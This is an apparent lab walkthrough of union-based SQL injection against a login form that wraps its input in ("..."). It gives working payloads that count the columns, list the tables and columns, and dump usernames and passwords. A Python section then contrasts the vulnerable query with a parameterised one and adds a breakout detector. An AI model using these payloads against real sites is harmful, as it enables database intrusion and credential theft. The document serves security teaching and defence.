Initial page:
Enter admin" in the Username field and anything in Password.
From the error message we can tell that the input is wrapped in ("...") on the server side, i.e. a ") is appended after the submitted value.
uname=ad")order by 2#&passwd=admin&submit=Submit
uname=ad")order by 3#&passwd=admin&submit=Submit
This shows the query has 2 columns; next, find which of them are echoed back to the page.
uname=ad") union select 1,2#&passwd=admin&submit=Submit
Read the current database name and current user:
uname=ad") union select user(),database()#&passwd=admin&submit=Submit
List all tables in the security database:
uname=ad") union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security')#&passwd=admin&submit=Submit
List all columns of the users table:
uname=ad") union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users')#&passwd=admin&submit=Submit
Read the values of the username and password columns:
uname=ad") union select 1,(select group_concat(username,password) from security.users)#&passwd=admin&submit=Submit
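Added example (not part of the original walkthrough or the lab's own code): it reproduces the ("...") wrapper the error message revealed, shows why a value beginning with ") breaks out of it, and places a parameterised login beside it that treats the same payload as plain data. The users table layout and its rows are constructed; SQLite stands in for MySQL.

```python
import sqlite3

# Constructed stand-in for the lab's security.users table (assumed layout).
SAMPLE_USERS = [(1, "Dumb", "Dumb"), (2, "admin", "admin")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def build_vulnerable_query(uname, passwd):
    """The string the lab builds: the raw POST value is dropped inside ("..."),
    so a value that starts with ") closes both delimiters and everything after
    it is parsed as SQL. Returned for inspection only; never executed here."""
    return ('SELECT username, password FROM users '
            f'WHERE username=("{uname}") AND password=("{passwd}")')


def login_safe(conn, uname, passwd):
    """Parameterised form of the same query: the driver sends uname and passwd
    as bound values, so a ") inside them is compared literally against the
    column instead of closing the wrapper."""
    return conn.execute(
        "SELECT id, username FROM users WHERE username = (?) AND password = (?)",
        (uname, passwd),
    ).fetchone()


def breaks_out(value):
    """Quick check for a logged request body or form value: True when the
    value closes the (" ") wrapper and continues with SQL, which is the shape
    of every payload in the walkthrough above."""
    parts = value.split('")', 1)
    if len(parts) < 2:
        return False
    rest = parts[1].lower()
    return any(kw in rest for kw in ("order by", "union", "select", "#"))


if __name__ == "__main__":
    db = make_db()
    payload = 'ad") union select 1,2#'
    print(build_vulnerable_query(payload, "admin"))   # shows the broken-out SQL
    print(login_safe(db, payload, "admin"))            # None: payload is just data
    print(login_safe(db, "admin", "admin"))            # (2, 'admin')
```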